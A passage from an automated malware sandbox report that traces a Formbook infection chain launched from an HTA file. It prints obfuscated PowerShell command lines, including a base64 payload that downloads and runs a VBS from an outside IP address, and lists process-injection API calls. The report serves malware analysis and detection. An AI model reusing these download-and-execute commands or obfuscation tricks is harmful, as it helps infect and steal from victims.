                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 12_2_01A22D30 NtUnmapViewOfSection,12_2_01A22D30
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 12_2_01A22D00 NtSetInformationFile,12_2_01A22D00
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 12_2_01A22D10 NtMapViewOfSection,12_2_01A22D10
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 12_2_01A22CA0 NtQueryInformationToken,12_2_01A22CA0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 12_2_01A22CF0 NtOpenProcess,12_2_01A22CF0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 12_2_01A22CC0 NtQueryVirtualMemory,12_2_01A22CC0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 12_2_01A22C00 NtQueryInformationProcess,12_2_01A22C00
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 12_2_01A22C60 NtCreateKey,12_2_01A22C60
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 12_2_01A22FA0 NtQuerySection,12_2_01A22FA0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 12_2_01A22FB0 NtResumeThread,12_2_01A22FB0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 12_2_01A22F90 NtProtectVirtualMemory,12_2_01A22F90
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 12_2_01A22FE0 NtCreateFile,12_2_01A22FE0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 12_2_01A22F30 NtCreateSection,12_2_01A22F30
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 12_2_01A22F60 NtCreateProcessEx,12_2_01A22F60
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 12_2_01A22EA0 NtAdjustPrivilegesToken,12_2_01A22EA0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 12_2_01A22E80 NtReadVirtualMemory,12_2_01A22E80
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 12_2_01A22EE0 NtQueueApcThread,12_2_01A22EE0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 12_2_01A22E30 NtWriteVirtualMemory,12_2_01A22E30
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 12_2_01A23090 NtSetValueKey,12_2_01A23090
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 12_2_01A23010 NtOpenDirectoryObject,12_2_01A23010
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 12_2_01A239B0 NtGetContextThread,12_2_01A239B0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 12_2_01A23D10 NtOpenProcessToken,12_2_01A23D10
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe Code function: 12_2_01A23D70 NtOpenThread,12_2_01A23D70
                  Source: C:\Windows\SysWOW64\mshta.exe, Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXE
                  Source: 12.2.aspnet_compiler.exe.400000.0.unpack, type: UNPACKEDPE, Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
                  Source: 12.2.aspnet_compiler.exe.400000.0.raw.unpack, type: UNPACKEDPE, Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
                  Source: 0000000C.00000002.2070222307.0000000001940000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY, Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
                  Source: 0000000C.00000002.2068186230.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY, Matched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
                  Source: Process Memory Space: powershell.exe PID: 6592, type: MEMORYSTR, Matched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
                  Source: powershell.exe, 00000003.00000002.1818468127.000000000811E000.00000004.00000020.00020000.00000000.sdmp, Binary or memory string: .slnz
                  Source: powershell.exe, 00000003.00000002.1818468127.000000000811E000.00000004.00000020.00020000.00000000.sdmp, Binary or memory string: .sLnz
                  Source: classification engine, Classification label: mal100.phis.troj.expl.evad.winHTA@17/16@1/2
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\seemebestthingsentirelifegivenbackwithgood[1].tiff
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, Mutant created: NULL
                  Source: C:\Windows\System32\conhost.exe, Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6804:120:WilError_03
                  Source: C:\Windows\System32\conhost.exe, Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6728:120:WilError_03
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, File created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_fykbl5oz.3nf.ps1
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\seemebestthingsentirelifegivenbac.vbS"
                  Source: C:\Windows\SysWOW64\mshta.exe, File read: C:\Users\user\Desktop\desktop.ini
                  Source: C:\Windows\SysWOW64\mshta.exe, Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
                  Source: seemebestgoodluckthings.hta, ReversingLabs: Detection: 15%
                  Source: unknown, Process created: C:\Windows\SysWOW64\mshta.exe mshta.exe "C:\Users\user\Desktop\seemebestgoodluckthings.hta"
                  Source: C:\Windows\SysWOW64\mshta.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" "/c pOwErSHelL.exE -ex BYpASS -NOp -w 1 -C dEVICeCreDENtialDePLOYMENT ; iNVOkE-eXPREsSioN($(InvOKE-EXpReSSiON('[syStEM.TeXT.eNCODiNG]'+[CHaR]0X3A+[chAr]0x3A+'utf8.geTstrINg([SYSTem.CoNverT]'+[CHar]0X3A+[ChAr]0x3A+'fRoMbASE64sTriNG('+[ChAr]34+'JFFwa0tZNkUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgID0gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFEZC10WXBFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbWVtQmVSZGVmaU5JdGlvbiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJ1tEbGxJbXBvcnQoInVyTG1vbi5kTEwiLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgSlF6LHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgemMsc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBUV2lKbWZpekcsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgcE1qdXRlSyxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGhHSWR3ZngpOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1uYW1lICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiYUFpTXpoIiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5hTUVTcEFDZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgSG1QTWMgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1QYXNzVGhydTsgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRRcGtLWTZFOjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTcyLjI0NS4xMjMuMTIvMzYxL3NlZW1lYmVzdHRoaW5nc2VudGlyZWxpZmVnaXZlbmJhY2t3aXRoZ29vZC50SUYiLCIkZW52OkFQUERBVEFcc2VlbWViZXN0dGhpbmdzZW50aXJlbGlmZWdpdmVuYmFjLnZiUyIsMCwwKTtTVEFydC1zTEVFcCgzKTtJaSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRFTlY6QVBQREFUQVxzZWVtZWJlc3R0aGluZ3NlbnRpcmVsaWZlZ2l2ZW5iYWMudmJTIg=='+[chaR]34+'))')))"
                  Source: C:\Windows\SysWOW64\cmd.exe, Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                  Source: C:\Windows\SysWOW64\cmd.exe, Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe pOwErSHelL.exE -ex BYpASS -NOp -w 1 -C dEVICeCreDENtialDePLOYMENT ; iNVOkE-eXPREsSioN($(InvOKE-EXpReSSiON('[syStEM.TeXT.eNCODiNG]'+[CHaR]0X3A+[chAr]0x3A+'utf8.geTstrINg([SYSTem.CoNverT]'+[CHar]0X3A+[ChAr]0x3A+'fRoMbASE64sTriNG('+[ChAr]34+'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'+[chaR]34+'))')))"
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\pdppuoci\pdppuoci.cmdline"
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe, Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES6914.tmp" "c:\Users\user\AppData\Local\Temp\pdppuoci\CSCAD4A7145578C4D2F8E5E86198ABD60D6.TMP"
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\seemebestthingsentirelifegivenbac.vbS"
                  Source: C:\Windows\SysWOW64\wscript.exe, Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $alastrar = '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';$morfose = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($alastrar));Invoke-Expression $morfose
                  Source: C:\Windows\SysWOW64\mshta.exe, Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                  Source: C:\Windows\SysWOW64\mshta.exe, Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: schannel.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mskeyprotect.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dllJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncryptsslp.dllJump to behavior
                  Source: C:\Windows\SysWOW64\mshta.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{25336920-03F9-11CF-8FD0-00AA00686F13}\InProcServer32Jump to behavior
                  Source: C:\Windows\SysWOW64\mshta.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Internet Explorer\SettingsJump to behavior
                  Source: Window RecorderWindow detected: More than 3 window changes detected
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
                  Source: Binary string: dnlib.dotnet.pdb source: powershell.exe, 00000007.00000002.2066570021.0000000007330000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2069177049.0000000007A7A000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: wntdll.pdbUGP source: aspnet_compiler.exe, 0000000C.00000002.2070837824.00000000019B0000.00000040.00001000.00020000.00000000.sdmp
                  Source: Binary string: dnlib.dotnet.writerpeheadersoptionsdnlib.dotnet.writerioffsetheap`1dnlib.dotnetimethoddnlib.dotnetcorlibtypesdnlib.dotnet.writertablesheapdnlib.dotnet.emitopcodetypednlib.dotnetiassemblyresolverdnlib.dotnetassemblyattributesdnlib.dotneticustomattributetypednlib.dotnetdummyloggerdnlib.dotnet.mdrawfieldptrrowdnlib.dotnetiloggermicrosoft.win32.taskschedulerdailytriggerdnlib.dotnettyperefuserdnlib.dotnet.writerdummymodulewriterlistenerdnlib.dotnetassemblyhashalgorithmdnlib.dotnet.pdbpdbdocumentdnlib.dotnetpinvokeattributesdnlib.dotnetivariablednlib.dotnetresourcednlib.dotnet.writerchunklist`1dnlib.dotnetiistypeormethodmicrosoft.win32.taskschedulercustomtriggerdnlib.dotnet.writerstartupstubdnlib.dotnetgenericinstmethodsigdnlib.dotnetmemberrefuserdnlib.dotnet.mdcomimageflagsdnlib.dotnetgenericparamdnlib.dotnet.writerchunklistbase`1dnlib.utilsextensionsdnlib.dotnetnativetypednlib.dotnet.mdrawenclogrowdnlib.dotnetgenericparamcontextdnlib.peimageoptionalheader64dnlib.dotnet.mdrawnestedclassrowdnlib.dotnetextensionsdnlib.dotneteventdefdnlib.dotnet.emitlocalc`5dnlib.dotneticontainsgenericparameterb`3b`1b`1b`1dnlib.dotnetitokenoperandc`1dnlib.dotnet.writerimdtablednlib.pedllcharacteristicsdnlib.dotnetifullnamednlib.dotnet.resourcesresourcereaderdnlib.dotnetstrongnamepublickeydnlib.dotnet.mdrawassemblyprocessorrowdnlib.dotnetbytearrayequalitycomparerdnlib.dotnet.mdrawmethodsemanticsrowdnlib.ioiimagestreamcreatordnlib.dotnetvtablefixupsmicrosoft.win32.taskschedulertaskprincipalprivilegemicrosoft.win32.taskschedulertasksnapshotdnlib.dotnet.pdbsymbolreadercreatordnlib.dotnet.emitinstructionprinterdnlib.dotnettypeequalitycomparerdnlib.dotnet.mdimagecor20headerdnlib.dotnet.mdirawrowdnlib.dotnet.writermethodbodywriterjgmicrosoft.win32.taskschedulertaskregistrationinfojfjejdjcmicrosoft.win32.taskschedulershowmessageactionjbdnlib.dotnetihasdeclsecuritycomhandlerupdatejamicrosoft.win32.taskschedulereventtriggerdnlib.dotnetimanagedentrypointstartup
_informationmicrosoft.win32.taskscheduler.fluentmonthlydowtriggerbuildermicrosoft.win32.taskschedulertaskauditrulednlib.dotnet.writerstrongnamesignaturednlib.dotnetitypednlib.dotnetsentinelsigdnlib.dotnet.mdicolumnreaderdnlib.dotnet.writermodulewritereventdnlib.dotnettypenameparserdnlib.dotneticustomattributednlib.dotnet.pdb.dsssymbolwritercreatordnlib.dotnet.resourcesbinaryresourcedatadnlib.dotnet.mdrawtyperefrowdnlib.ioimagestreamcreatorconnectiontokenex`2dnlib.pepeextensionsdnlib.dotnet.pdbsequencepointdnlib.dotnetlinkedresourcednlib.dotnettyperefdnlib.dotnetpublickeydnlib.dotnetiassemblyreffinderdnlib.dotnet.mdrawgenericparamconstraintrowdnlib.dotnettypedefdnlib.dotnetrecursioncounterdnlib.dotnet.mdrawassemblyrefosrowdnlib.pecharacteristicsdnlib.w32resourcesresourcedirectorype source: powershell.exe, 00000007.00000002.2066570021.0000000007330000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: wntdll.pdb source: aspnet_compiler.exe, aspnet_compiler.exe, 0000000C.00000002.2070837824.00000000019B0000.00000040.00001000.00020000.00000000.sdmp
                  Source: Binary string: $dq7C:\Users\user\AppData\Local\Temp\pdppuoci\pdppuoci.pdb source: powershell.exe, 00000003.00000002.1813925745.000000000502D000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: ystem.Management.Automation.pdb source: powershell.exe, 00000003.00000002.1812401473.0000000000B04000.00000004.00000020.00020000.00000000.sdmp
                  Source: Binary string: dnlib.dotnet.pdb.dss source: powershell.exe, 00000007.00000002.2066570021.0000000007330000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2069177049.0000000007A7A000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.dotnet.pdb.managed source: powershell.exe, 00000007.00000002.2069177049.0000000007A7A000.00000004.00000800.00020000.00000000.sdmp

                  Data Obfuscation

                  Source: C:\Windows\SysWOW64\mshta.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" "/c pOwErSHelL.exE -ex BYpASS -NOp -w 1 -C dEVICeCreDENtialDePLOYMENT ; iNVOkE-eXPREsSioN($(InvOKE-EXpReSSiON('[syStEM.TeXT.eNCODiNG]'+[CHaR]0X3A+[chAr]0x3A+'utf8.geTstrINg([SYSTem.CoNverT]'+[CHar]0X3A+[ChAr]0x3A+'fRoMbASE64sTriNG('+[ChAr]34+'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'+[chaR]34+'))')))"
                  Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe pOwErSHelL.exE -ex BYpASS -NOp -w 1 -C dEVICeCreDENtialDePLOYMENT ; iNVOkE-eXPREsSioN($(InvOKE-EXpReSSiON('[syStEM.TeXT.eNCODiNG]'+[CHaR]0X3A+[chAr]0x3A+'utf8.geTstrINg([SYSTem.CoNverT]'+[CHar]0X3A+[ChAr]0x3A+'fRoMbASE64sTriNG('+[ChAr]34+'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'+[chaR]34+'))')))"
                  Source: C:\Windows\SysWOW64\mshta.exeProcess created: "C:\Windows\system32\cmd.exe" "/c pOwErSHelL.exE -ex BYpASS -NOp -w 1 -C dEVICeCreDENtialDePLOYMENT ; iNVOkE-eXPREsSioN($(InvOKE-EXpReSSiON('[syStEM.TeXT.eNCODiNG]'+[CHaR]0X3A+[chAr]0x3A+'utf8.geTstrINg([SYSTem.CoNverT]'+[CHar]0X3A+[ChAr]0x3A+'fRoMbASE64sTriNG('+[ChAr]34+'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'+[chaR]34+'))')))"
                  Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $alastrar = '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';$morfose = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($alastrar));Invoke-Expression $morfose
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\pdppuoci\pdppuoci.cmdline"
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 3_2_00C9B73D push 8BD08B56h; iretd 3_2_00C9B743
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 7_2_04C329C0 push cs; retf 0007h7_2_04C329C2
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 7_2_04C329A0 push cs; retf 0007h7_2_04C329A2
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 7_2_04C32A30 pushfd ; ret 7_2_04C32A3A
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_00407041 push cs; iretd 12_2_00407042
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_0041705E push edi; iretd 12_2_00417060
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_004030F0 push eax; ret 12_2_004030F2
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_0041C8FC push cs; iretd 12_2_0041C8C9
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_00401949 push 63DCA26Ah; ret 12_2_0040194E
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_0040214B push edx; retf 12_2_0040214E
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_00402101 push ebp; iretd 12_2_0040210D
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_0040210E push eax; retf 12_2_0040214A
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_004021A4 push eax; retf 12_2_0040214A
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_0041125B pushfd ; ret 12_2_0041125E
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_004242D9 push esp; ret 12_2_00424330
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_004242E3 push esp; ret 12_2_00424330
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_00401AB8 push edx; retf 12_2_00401AE3
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_00413416 push ecx; iretd 12_2_00413417
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_0041ECDC push ds; iretd 12_2_0041ECDD
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_00401DF5 push ebp; iretd 12_2_00401DB2
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_00401DA6 push ebp; iretd 12_2_00401DB2
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_00416EAA push esp; retf 12_2_00416EAB
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_00401F0D push eax; retf 12_2_00401F19
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_00401FEB push edx; retf 12_2_00401FEC
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_00410FEE push ebp; iretd 12_2_00411000
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_00410FF3 push ebp; iretd 12_2_00411000
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_00401FA4 push edx; ret 12_2_00401FAD
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_00401FBA push 0000006Ah; iretd 12_2_00401FC6
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 12_2_019E09AD push ecx; mov dword ptr [esp], ecx12_2_019E09B6
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeFile created: C:\Users\user\AppData\Local\Temp\pdppuoci\pdppuoci.dllJump to dropped file

                  Hooking and other Techniques for Hiding and Protection

                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                  Source: C:\Windows\SysWOW64\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                  Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
